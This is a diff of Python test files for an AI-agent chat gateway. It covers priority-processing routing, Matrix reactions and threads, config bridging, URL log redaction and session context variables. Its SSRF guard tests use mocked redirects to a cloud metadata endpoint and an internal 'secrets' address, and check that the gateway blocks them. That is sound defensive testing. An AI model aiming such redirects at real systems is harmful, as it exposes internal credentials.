assert adapter._resolve_channel_skills("100") == ["a", "b", "c"]
|
||||
@@ -0,0 +1,191 @@
|
||||
"""Tests for gateway /fast support and Priority Processing routing."""
|
||||
|
||||
import sys
|
||||
import threading
|
||||
import types
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, patch
|
||||
|
||||
import pytest
|
||||
import yaml
|
||||
|
||||
import gateway.run as gateway_run
|
||||
from gateway.config import Platform
|
||||
from gateway.platforms.base import MessageEvent
|
||||
from gateway.session import SessionSource
|
||||
|
||||
|
||||
class _CapturingAgent:
|
||||
last_init = None
|
||||
last_run = None
|
||||
|
||||
def __init__(self, *args, **kwargs):
|
||||
type(self).last_init = dict(kwargs)
|
||||
self.tools = []
|
||||
|
||||
def run_conversation(self, user_message, conversation_history=None, task_id=None, persist_user_message=None):
|
||||
type(self).last_run = {
|
||||
"user_message": user_message,
|
||||
"conversation_history": conversation_history,
|
||||
"task_id": task_id,
|
||||
"persist_user_message": persist_user_message,
|
||||
}
|
||||
return {
|
||||
"final_response": "ok",
|
||||
"messages": [],
|
||||
"api_calls": 1,
|
||||
"completed": True,
|
||||
}
|
||||
|
||||
|
||||
def _install_fake_agent(monkeypatch):
|
||||
fake_run_agent = types.ModuleType("run_agent")
|
||||
fake_run_agent.AIAgent = _CapturingAgent
|
||||
monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
|
||||
|
||||
|
||||
def _make_runner():
|
||||
runner = object.__new__(gateway_run.GatewayRunner)
|
||||
runner.adapters = {}
|
||||
runner._ephemeral_system_prompt = ""
|
||||
runner._prefill_messages = []
|
||||
runner._reasoning_config = None
|
||||
runner._service_tier = None
|
||||
runner._provider_routing = {}
|
||||
runner._fallback_model = None
|
||||
runner._smart_model_routing = {}
|
||||
runner._running_agents = {}
|
||||
runner._pending_model_notes = {}
|
||||
runner._session_db = None
|
||||
runner._agent_cache = {}
|
||||
runner._agent_cache_lock = threading.Lock()
|
||||
runner._session_model_overrides = {}
|
||||
runner.hooks = SimpleNamespace(loaded_hooks=False)
|
||||
runner.config = SimpleNamespace(streaming=None)
|
||||
runner.session_store = SimpleNamespace(
|
||||
get_or_create_session=lambda source: SimpleNamespace(session_id="session-1"),
|
||||
load_transcript=lambda session_id: [],
|
||||
)
|
||||
runner._get_or_create_gateway_honcho = lambda session_key: (None, None)
|
||||
runner._enrich_message_with_vision = AsyncMock(return_value="ENRICHED")
|
||||
return runner
|
||||
|
||||
|
||||
def _make_source() -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="12345",
|
||||
chat_type="dm",
|
||||
user_id="user-1",
|
||||
)
|
||||
|
||||
|
||||
def _make_event(text: str) -> MessageEvent:
|
||||
return MessageEvent(text=text, source=_make_source(), message_id="m1")
|
||||
|
||||
|
||||
def test_turn_route_injects_priority_processing_without_changing_runtime():
|
||||
runner = _make_runner()
|
||||
runner._service_tier = "priority"
|
||||
runtime_kwargs = {
|
||||
"api_key": "***",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"provider": "openrouter",
|
||||
"api_mode": "chat_completions",
|
||||
"command": None,
|
||||
"args": [],
|
||||
"credential_pool": None,
|
||||
}
|
||||
|
||||
with patch("agent.smart_model_routing.resolve_turn_route", return_value={
|
||||
"model": "gpt-5.4",
|
||||
"runtime": dict(runtime_kwargs),
|
||||
"label": None,
|
||||
"signature": ("gpt-5.4", "openrouter", "https://openrouter.ai/api/v1", "chat_completions", None, ()),
|
||||
}):
|
||||
route = gateway_run.GatewayRunner._resolve_turn_agent_config(runner, "hi", "gpt-5.4", runtime_kwargs)
|
||||
|
||||
assert route["runtime"]["provider"] == "openrouter"
|
||||
assert route["runtime"]["api_mode"] == "chat_completions"
|
||||
assert route["request_overrides"] == {"service_tier": "priority"}
|
||||
|
||||
|
||||
def test_turn_route_skips_priority_processing_for_unsupported_models():
|
||||
runner = _make_runner()
|
||||
runner._service_tier = "priority"
|
||||
runtime_kwargs = {
|
||||
"api_key": "***",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"provider": "openrouter",
|
||||
"api_mode": "chat_completions",
|
||||
"command": None,
|
||||
"args": [],
|
||||
"credential_pool": None,
|
||||
}
|
||||
|
||||
with patch("agent.smart_model_routing.resolve_turn_route", return_value={
|
||||
"model": "gpt-5.3-codex",
|
||||
"runtime": dict(runtime_kwargs),
|
||||
"label": None,
|
||||
"signature": ("gpt-5.3-codex", "openrouter", "https://openrouter.ai/api/v1", "chat_completions", None, ()),
|
||||
}):
|
||||
route = gateway_run.GatewayRunner._resolve_turn_agent_config(runner, "hi", "gpt-5.3-codex", runtime_kwargs)
|
||||
|
||||
assert route["request_overrides"] is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_handle_fast_command_persists_config(monkeypatch, tmp_path):
|
||||
runner = _make_runner()
|
||||
|
||||
monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
|
||||
monkeypatch.setattr(gateway_run, "_load_gateway_config", lambda: {})
|
||||
monkeypatch.setattr(gateway_run, "_resolve_gateway_model", lambda config=None: "gpt-5.4")
|
||||
|
||||
response = await runner._handle_fast_command(_make_event("/fast fast"))
|
||||
|
||||
assert "FAST" in response
|
||||
assert runner._service_tier == "priority"
|
||||
|
||||
saved = yaml.safe_load((tmp_path / "config.yaml").read_text(encoding="utf-8"))
|
||||
assert saved["agent"]["service_tier"] == "fast"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_run_agent_passes_priority_processing_to_gateway_agent(monkeypatch, tmp_path):
|
||||
_install_fake_agent(monkeypatch)
|
||||
runner = _make_runner()
|
||||
|
||||
(tmp_path / "config.yaml").write_text("agent:\n service_tier: fast\n", encoding="utf-8")
|
||||
monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
|
||||
monkeypatch.setattr(gateway_run, "_env_path", tmp_path / ".env")
|
||||
monkeypatch.setattr(gateway_run, "load_dotenv", lambda *args, **kwargs: None)
|
||||
monkeypatch.setattr(gateway_run, "_load_gateway_config", lambda: {})
|
||||
monkeypatch.setattr(gateway_run, "_resolve_gateway_model", lambda config=None: "gpt-5.4")
|
||||
monkeypatch.setattr(
|
||||
gateway_run,
|
||||
"_resolve_runtime_agent_kwargs",
|
||||
lambda: {
|
||||
"provider": "openrouter",
|
||||
"api_mode": "chat_completions",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"api_key": "***",
|
||||
},
|
||||
)
|
||||
|
||||
import hermes_cli.tools_config as tools_config
|
||||
monkeypatch.setattr(tools_config, "_get_platform_tools", lambda user_config, platform_key: {"core"})
|
||||
|
||||
_CapturingAgent.last_init = None
|
||||
result = await runner._run_agent(
|
||||
message="hi",
|
||||
context_prompt="",
|
||||
history=[],
|
||||
source=_make_source(),
|
||||
session_id="session-1",
|
||||
session_key="agent:main:telegram:dm:12345",
|
||||
)
|
||||
|
||||
assert result["final_response"] == "ok"
|
||||
assert _CapturingAgent.last_init["service_tier"] == "priority"
|
||||
assert _CapturingAgent.last_init["request_overrides"] == {"service_tier": "priority"}
|
||||
@@ -1943,7 +1943,7 @@ class TestMatrixReactions:
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
result = await self.adapter._send_reaction("!room:ex", "$event1", "👍")
|
||||
assert result is True
|
||||
assert result == "$reaction1"
|
||||
mock_client.room_send.assert_called_once()
|
||||
args = mock_client.room_send.call_args
|
||||
assert args[0][1] == "m.reaction"
|
||||
@@ -1956,7 +1956,7 @@ class TestMatrixReactions:
|
||||
self.adapter._client = None
|
||||
with patch.dict("sys.modules", {"nio": _make_fake_nio()}):
|
||||
result = await self.adapter._send_reaction("!room:ex", "$ev", "👍")
|
||||
assert result is False
|
||||
assert result is None
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_start_sends_eyes(self):
|
||||
@@ -1964,7 +1964,7 @@ class TestMatrixReactions:
|
||||
from gateway.platforms.base import MessageEvent, MessageType
|
||||
|
||||
self.adapter._reactions_enabled = True
|
||||
self.adapter._send_reaction = AsyncMock(return_value=True)
|
||||
self.adapter._send_reaction = AsyncMock(return_value="$reaction_event_123")
|
||||
|
||||
source = MagicMock()
|
||||
source.chat_id = "!room:ex"
|
||||
@@ -1977,13 +1977,16 @@ class TestMatrixReactions:
|
||||
)
|
||||
await self.adapter.on_processing_start(event)
|
||||
self.adapter._send_reaction.assert_called_once_with("!room:ex", "$msg1", "👀")
|
||||
assert self.adapter._pending_reactions == {("!room:ex", "$msg1"): "$reaction_event_123"}
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_complete_sends_check(self):
|
||||
from gateway.platforms.base import MessageEvent, MessageType, ProcessingOutcome
|
||||
|
||||
self.adapter._reactions_enabled = True
|
||||
self.adapter._send_reaction = AsyncMock(return_value=True)
|
||||
self.adapter._pending_reactions = {("!room:ex", "$msg1"): "$eyes_reaction_123"}
|
||||
self.adapter._redact_reaction = AsyncMock(return_value=True)
|
||||
self.adapter._send_reaction = AsyncMock(return_value="$check_reaction_456")
|
||||
|
||||
source = MagicMock()
|
||||
source.chat_id = "!room:ex"
|
||||
@@ -1995,8 +1998,31 @@ class TestMatrixReactions:
|
||||
message_id="$msg1",
|
||||
)
|
||||
await self.adapter.on_processing_complete(event, ProcessingOutcome.SUCCESS)
|
||||
self.adapter._redact_reaction.assert_called_once_with("!room:ex", "$eyes_reaction_123")
|
||||
self.adapter._send_reaction.assert_called_once_with("!room:ex", "$msg1", "✅")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_complete_sends_cross_on_failure(self):
|
||||
from gateway.platforms.base import MessageEvent, MessageType, ProcessingOutcome
|
||||
|
||||
self.adapter._reactions_enabled = True
|
||||
self.adapter._pending_reactions = {("!room:ex", "$msg1"): "$eyes_reaction_123"}
|
||||
self.adapter._redact_reaction = AsyncMock(return_value=True)
|
||||
self.adapter._send_reaction = AsyncMock(return_value="$cross_reaction_456")
|
||||
|
||||
source = MagicMock()
|
||||
source.chat_id = "!room:ex"
|
||||
event = MessageEvent(
|
||||
text="hello",
|
||||
message_type=MessageType.TEXT,
|
||||
source=source,
|
||||
raw_message={},
|
||||
message_id="$msg1",
|
||||
)
|
||||
await self.adapter.on_processing_complete(event, ProcessingOutcome.FAILURE)
|
||||
self.adapter._redact_reaction.assert_called_once_with("!room:ex", "$eyes_reaction_123")
|
||||
self.adapter._send_reaction.assert_called_once_with("!room:ex", "$msg1", "❌")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_complete_cancelled_sends_no_terminal_reaction(self):
|
||||
from gateway.platforms.base import MessageEvent, MessageType, ProcessingOutcome
|
||||
@@ -2016,6 +2042,29 @@ class TestMatrixReactions:
|
||||
await self.adapter.on_processing_complete(event, ProcessingOutcome.CANCELLED)
|
||||
self.adapter._send_reaction.assert_not_called()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_complete_no_pending_reaction(self):
|
||||
"""on_processing_complete should skip redaction if no eyes reaction was tracked."""
|
||||
from gateway.platforms.base import MessageEvent, MessageType, ProcessingOutcome
|
||||
|
||||
self.adapter._reactions_enabled = True
|
||||
self.adapter._pending_reactions = {}
|
||||
self.adapter._redact_reaction = AsyncMock()
|
||||
self.adapter._send_reaction = AsyncMock(return_value="$check_reaction_789")
|
||||
|
||||
source = MagicMock()
|
||||
source.chat_id = "!room:ex"
|
||||
event = MessageEvent(
|
||||
text="hello",
|
||||
message_type=MessageType.TEXT,
|
||||
source=source,
|
||||
raw_message={},
|
||||
message_id="$msg1",
|
||||
)
|
||||
await self.adapter.on_processing_complete(event, ProcessingOutcome.SUCCESS)
|
||||
self.adapter._redact_reaction.assert_not_called()
|
||||
self.adapter._send_reaction.assert_called_once_with("!room:ex", "$msg1", "✅")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reactions_disabled(self):
|
||||
from gateway.platforms.base import MessageEvent, MessageType
|
||||
|
||||
@@ -436,6 +436,95 @@ class TestThreadPersistence:
|
||||
assert len(data) == 5
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# DM mention-thread feature
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_disabled_by_default(monkeypatch):
|
||||
"""Default (dm_mention_threads=false): DM with mention should NOT create a thread."""
|
||||
monkeypatch.delenv("MATRIX_DM_MENTION_THREADS", raising=False)
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help me", event_id="$dm1")
|
||||
|
||||
await adapter._on_room_message(room, event)
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_creates_thread(monkeypatch):
|
||||
"""MATRIX_DM_MENTION_THREADS=true: DM with @mention creates a thread."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help me", event_id="$dm1")
|
||||
|
||||
with patch.object(adapter, "_save_participated_threads"):
|
||||
await adapter._on_room_message(room, event)
|
||||
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id == "$dm1"
|
||||
assert msg.text == "help me"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_no_mention_no_thread(monkeypatch):
|
||||
"""MATRIX_DM_MENTION_THREADS=true: DM without mention does NOT create a thread."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("hello without mention", event_id="$dm1")
|
||||
|
||||
await adapter._on_room_message(room, event)
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_preserves_existing_thread(monkeypatch):
|
||||
"""MATRIX_DM_MENTION_THREADS=true: DM already in a thread keeps that thread_id."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
adapter._bot_participated_threads.add("$existing_thread")
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help me", thread_id="$existing_thread")
|
||||
|
||||
await adapter._on_room_message(room, event)
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id == "$existing_thread"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_tracks_participation(monkeypatch):
|
||||
"""DM mention-thread tracks the thread in _bot_participated_threads."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help", event_id="$dm1")
|
||||
|
||||
with patch.object(adapter, "_save_participated_threads"):
|
||||
await adapter._on_room_message(room, event)
|
||||
|
||||
assert "$dm1" in adapter._bot_participated_threads
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# YAML config bridge
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -480,6 +569,25 @@ class TestMatrixConfigBridge:
|
||||
assert os.getenv("MATRIX_FREE_RESPONSE_ROOMS") == "!room1:example.org,!room2:example.org"
|
||||
assert os.getenv("MATRIX_AUTO_THREAD") == "false"
|
||||
|
||||
def test_yaml_bridge_sets_dm_mention_threads(self, monkeypatch, tmp_path):
|
||||
"""Matrix YAML dm_mention_threads should bridge to env var."""
|
||||
monkeypatch.delenv("MATRIX_DM_MENTION_THREADS", raising=False)
|
||||
|
||||
import os
|
||||
import yaml
|
||||
|
||||
yaml_content = {"matrix": {"dm_mention_threads": True}}
|
||||
config_file = tmp_path / "config.yaml"
|
||||
config_file.write_text(yaml.dump(yaml_content))
|
||||
|
||||
yaml_cfg = yaml.safe_load(config_file.read_text())
|
||||
matrix_cfg = yaml_cfg.get("matrix", {})
|
||||
if isinstance(matrix_cfg, dict):
|
||||
if "dm_mention_threads" in matrix_cfg and not os.getenv("MATRIX_DM_MENTION_THREADS"):
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", str(matrix_cfg["dm_mention_threads"]).lower())
|
||||
|
||||
assert os.getenv("MATRIX_DM_MENTION_THREADS") == "true"
|
||||
|
||||
def test_env_vars_take_precedence_over_yaml(self, monkeypatch):
|
||||
"""Env vars should not be overwritten by YAML values."""
|
||||
monkeypatch.setenv("MATRIX_REQUIRE_MENTION", "true")
|
||||
|
||||
@@ -376,6 +376,134 @@ class TestCacheAudioFromUrl:
|
||||
mock_sleep.assert_not_called()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# SSRF redirect guard tests (base.py)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestSSRFRedirectGuard:
|
||||
"""cache_image_from_url / cache_audio_from_url must reject redirects
|
||||
that land on private/internal hosts (e.g. cloud metadata endpoint)."""
|
||||
|
||||
def _make_redirect_response(self, target_url: str):
|
||||
"""Build a mock httpx response that looks like a redirect."""
|
||||
resp = MagicMock()
|
||||
resp.is_redirect = True
|
||||
resp.next_request = MagicMock(url=target_url)
|
||||
return resp
|
||||
|
||||
def _make_client_capturing_hooks(self):
|
||||
"""Return (mock_client, captured_kwargs dict) where captured_kwargs
|
||||
will contain the kwargs passed to httpx.AsyncClient()."""
|
||||
captured = {}
|
||||
mock_client = AsyncMock()
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
def factory(*args, **kwargs):
|
||||
captured.update(kwargs)
|
||||
return mock_client
|
||||
|
||||
return mock_client, captured, factory
|
||||
|
||||
def test_image_blocks_private_redirect(self, tmp_path, monkeypatch):
|
||||
"""cache_image_from_url rejects a redirect to a private IP."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
redirect_resp = self._make_redirect_response(
|
||||
"http://169.254.169.254/latest/meta-data"
|
||||
)
|
||||
mock_client, captured, factory = self._make_client_capturing_hooks()
|
||||
|
||||
async def fake_get(_url, **kwargs):
|
||||
# Simulate httpx calling the response event hooks
|
||||
for hook in captured["event_hooks"]["response"]:
|
||||
await hook(redirect_resp)
|
||||
|
||||
mock_client.get = AsyncMock(side_effect=fake_get)
|
||||
|
||||
def fake_safe(url):
|
||||
return url == "https://public.example.com/image.png"
|
||||
|
||||
async def run():
|
||||
with patch("tools.url_safety.is_safe_url", side_effect=fake_safe), \
|
||||
patch("httpx.AsyncClient", side_effect=factory):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
await cache_image_from_url(
|
||||
"https://public.example.com/image.png", ext=".png"
|
||||
)
|
||||
|
||||
with pytest.raises(ValueError, match="Blocked redirect"):
|
||||
asyncio.run(run())
|
||||
|
||||
def test_audio_blocks_private_redirect(self, tmp_path, monkeypatch):
|
||||
"""cache_audio_from_url rejects a redirect to a private IP."""
|
||||
monkeypatch.setattr("gateway.platforms.base.AUDIO_CACHE_DIR", tmp_path / "audio")
|
||||
|
||||
redirect_resp = self._make_redirect_response(
|
||||
"http://10.0.0.1/internal/secrets"
|
||||
)
|
||||
mock_client, captured, factory = self._make_client_capturing_hooks()
|
||||
|
||||
async def fake_get(_url, **kwargs):
|
||||
for hook in captured["event_hooks"]["response"]:
|
||||
await hook(redirect_resp)
|
||||
|
||||
mock_client.get = AsyncMock(side_effect=fake_get)
|
||||
|
||||
def fake_safe(url):
|
||||
return url == "https://public.example.com/voice.ogg"
|
||||
|
||||
async def run():
|
||||
with patch("tools.url_safety.is_safe_url", side_effect=fake_safe), \
|
||||
patch("httpx.AsyncClient", side_effect=factory):
|
||||
from gateway.platforms.base import cache_audio_from_url
|
||||
await cache_audio_from_url(
|
||||
"https://public.example.com/voice.ogg", ext=".ogg"
|
||||
)
|
||||
|
||||
with pytest.raises(ValueError, match="Blocked redirect"):
|
||||
asyncio.run(run())
|
||||
|
||||
def test_safe_redirect_allowed(self, tmp_path, monkeypatch):
|
||||
"""A redirect to a public IP is allowed through."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
redirect_resp = self._make_redirect_response(
|
||||
"https://cdn.example.com/real-image.png"
|
||||
)
|
||||
|
||||
ok_response = MagicMock()
|
||||
ok_response.content = b"\xff\xd8\xff fake jpeg"
|
||||
ok_response.raise_for_status = MagicMock()
|
||||
ok_response.is_redirect = False
|
||||
|
||||
mock_client, captured, factory = self._make_client_capturing_hooks()
|
||||
|
||||
call_count = 0
|
||||
|
||||
async def fake_get(_url, **kwargs):
|
||||
nonlocal call_count
|
||||
call_count += 1
|
||||
# First call triggers redirect hook, second returns data
|
||||
for hook in captured["event_hooks"]["response"]:
|
||||
await hook(redirect_resp if call_count == 1 else ok_response)
|
||||
return ok_response
|
||||
|
||||
mock_client.get = AsyncMock(side_effect=fake_get)
|
||||
|
||||
async def run():
|
||||
with patch("tools.url_safety.is_safe_url", return_value=True), \
|
||||
patch("httpx.AsyncClient", side_effect=factory):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
return await cache_image_from_url(
|
||||
"https://public.example.com/image.png", ext=".jpg"
|
||||
)
|
||||
|
||||
path = asyncio.run(run())
|
||||
assert path.endswith(".jpg")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Slack mock setup (mirrors existing test_slack.py approach)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -8,7 +8,7 @@ from gateway.platforms.base import (
|
||||
GATEWAY_SECRET_CAPTURE_UNSUPPORTED_MESSAGE,
|
||||
MessageEvent,
|
||||
MessageType,
|
||||
_safe_url_for_log,
|
||||
safe_url_for_log,
|
||||
)
|
||||
|
||||
|
||||
@@ -25,7 +25,7 @@ class TestSafeUrlForLog:
|
||||
"https://user:pass@example.com/private/path/image.png"
|
||||
"?X-Amz-Signature=supersecret&token=abc#frag"
|
||||
)
|
||||
result = _safe_url_for_log(url)
|
||||
result = safe_url_for_log(url)
|
||||
assert result == "https://example.com/.../image.png"
|
||||
assert "supersecret" not in result
|
||||
assert "token=abc" not in result
|
||||
@@ -33,15 +33,15 @@ class TestSafeUrlForLog:
|
||||
|
||||
def test_truncates_long_values(self):
|
||||
long_url = "https://example.com/" + ("a" * 300)
|
||||
result = _safe_url_for_log(long_url, max_len=40)
|
||||
result = safe_url_for_log(long_url, max_len=40)
|
||||
assert len(result) == 40
|
||||
assert result.endswith("...")
|
||||
|
||||
def test_handles_small_and_non_positive_max_len(self):
|
||||
url = "https://example.com/very/long/path/file.png?token=secret"
|
||||
assert _safe_url_for_log(url, max_len=3) == "..."
|
||||
assert _safe_url_for_log(url, max_len=2) == ".."
|
||||
assert _safe_url_for_log(url, max_len=0) == ""
|
||||
assert safe_url_for_log(url, max_len=3) == "..."
|
||||
assert safe_url_for_log(url, max_len=2) == ".."
|
||||
assert safe_url_for_log(url, max_len=0) == ""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -3,9 +3,15 @@ import os
|
||||
from gateway.config import Platform
|
||||
from gateway.run import GatewayRunner
|
||||
from gateway.session import SessionContext, SessionSource
|
||||
from gateway.session_context import (
|
||||
get_session_env,
|
||||
set_session_vars,
|
||||
clear_session_vars,
|
||||
)
|
||||
|
||||
|
||||
def test_set_session_env_includes_thread_id(monkeypatch):
|
||||
def test_set_session_env_sets_contextvars(monkeypatch):
|
||||
"""_set_session_env should populate contextvars, not os.environ."""
|
||||
runner = object.__new__(GatewayRunner)
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
@@ -21,25 +27,93 @@ def test_set_session_env_includes_thread_id(monkeypatch):
|
||||
monkeypatch.delenv("HERMES_SESSION_CHAT_NAME", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_THREAD_ID", raising=False)
|
||||
|
||||
runner._set_session_env(context)
|
||||
tokens = runner._set_session_env(context)
|
||||
|
||||
assert os.getenv("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
assert os.getenv("HERMES_SESSION_CHAT_ID") == "-1001"
|
||||
assert os.getenv("HERMES_SESSION_CHAT_NAME") == "Group"
|
||||
assert os.getenv("HERMES_SESSION_THREAD_ID") == "17585"
|
||||
# Values should be readable via get_session_env (contextvar path)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_ID") == "-1001"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_NAME") == "Group"
|
||||
assert get_session_env("HERMES_SESSION_THREAD_ID") == "17585"
|
||||
|
||||
# os.environ should NOT be touched
|
||||
assert os.getenv("HERMES_SESSION_PLATFORM") is None
|
||||
assert os.getenv("HERMES_SESSION_THREAD_ID") is None
|
||||
|
||||
# Clean up
|
||||
runner._clear_session_env(tokens)
|
||||
|
||||
|
||||
def test_clear_session_env_removes_thread_id(monkeypatch):
|
||||
def test_clear_session_env_restores_previous_state(monkeypatch):
|
||||
"""_clear_session_env should restore contextvars to their pre-handler values."""
|
||||
runner = object.__new__(GatewayRunner)
|
||||
|
||||
monkeypatch.setenv("HERMES_SESSION_PLATFORM", "telegram")
|
||||
monkeypatch.setenv("HERMES_SESSION_CHAT_ID", "-1001")
|
||||
monkeypatch.setenv("HERMES_SESSION_CHAT_NAME", "Group")
|
||||
monkeypatch.setenv("HERMES_SESSION_THREAD_ID", "17585")
|
||||
monkeypatch.delenv("HERMES_SESSION_PLATFORM", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_CHAT_ID", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_CHAT_NAME", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_THREAD_ID", raising=False)
|
||||
|
||||
runner._clear_session_env()
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="-1001",
|
||||
chat_name="Group",
|
||||
chat_type="group",
|
||||
thread_id="17585",
|
||||
)
|
||||
context = SessionContext(source=source, connected_platforms=[], home_channels={})
|
||||
|
||||
assert os.getenv("HERMES_SESSION_PLATFORM") is None
|
||||
assert os.getenv("HERMES_SESSION_CHAT_ID") is None
|
||||
assert os.getenv("HERMES_SESSION_CHAT_NAME") is None
|
||||
assert os.getenv("HERMES_SESSION_THREAD_ID") is None
|
||||
tokens = runner._set_session_env(context)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
|
||||
runner._clear_session_env(tokens)
|
||||
|
||||
# After clear, contextvars should return to defaults (empty)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == ""
|
||||
assert get_session_env("HERMES_SESSION_CHAT_ID") == ""
|
||||
assert get_session_env("HERMES_SESSION_CHAT_NAME") == ""
|
||||
assert get_session_env("HERMES_SESSION_THREAD_ID") == ""
|
||||
|
||||
|
||||
def test_get_session_env_falls_back_to_os_environ(monkeypatch):
|
||||
"""get_session_env should fall back to os.environ when contextvar is unset."""
|
||||
monkeypatch.setenv("HERMES_SESSION_PLATFORM", "discord")
|
||||
|
||||
# No contextvar set — should read from os.environ
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "discord"
|
||||
|
||||
# Now set a contextvar — should prefer it
|
||||
tokens = set_session_vars(platform="telegram")
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
|
||||
# Restore — should fall back to os.environ again
|
||||
clear_session_vars(tokens)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "discord"
|
||||
|
||||
|
||||
def test_get_session_env_default_when_nothing_set(monkeypatch):
|
||||
"""get_session_env returns default when neither contextvar nor env is set."""
|
||||
monkeypatch.delenv("HERMES_SESSION_PLATFORM", raising=False)
|
||||
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == ""
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM", "fallback") == "fallback"
|
||||
|
||||
|
||||
def test_set_session_env_handles_missing_optional_fields():
|
||||
"""_set_session_env should handle None chat_name and thread_id gracefully."""
|
||||
runner = object.__new__(GatewayRunner)
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="-1001",
|
||||
chat_name=None,
|
||||
chat_type="private",
|
||||
thread_id=None,
|
||||
)
|
||||
context = SessionContext(source=source, connected_platforms=[], home_channels={})
|
||||
|
||||
tokens = runner._set_session_env(context)
|
||||
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_ID") == "-1001"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_NAME") == ""
|
||||
assert get_session_env("HERMES_SESSION_THREAD_ID") == ""
|
||||
|
||||
runner._clear_session_env(tokens)
|
||||
|
||||
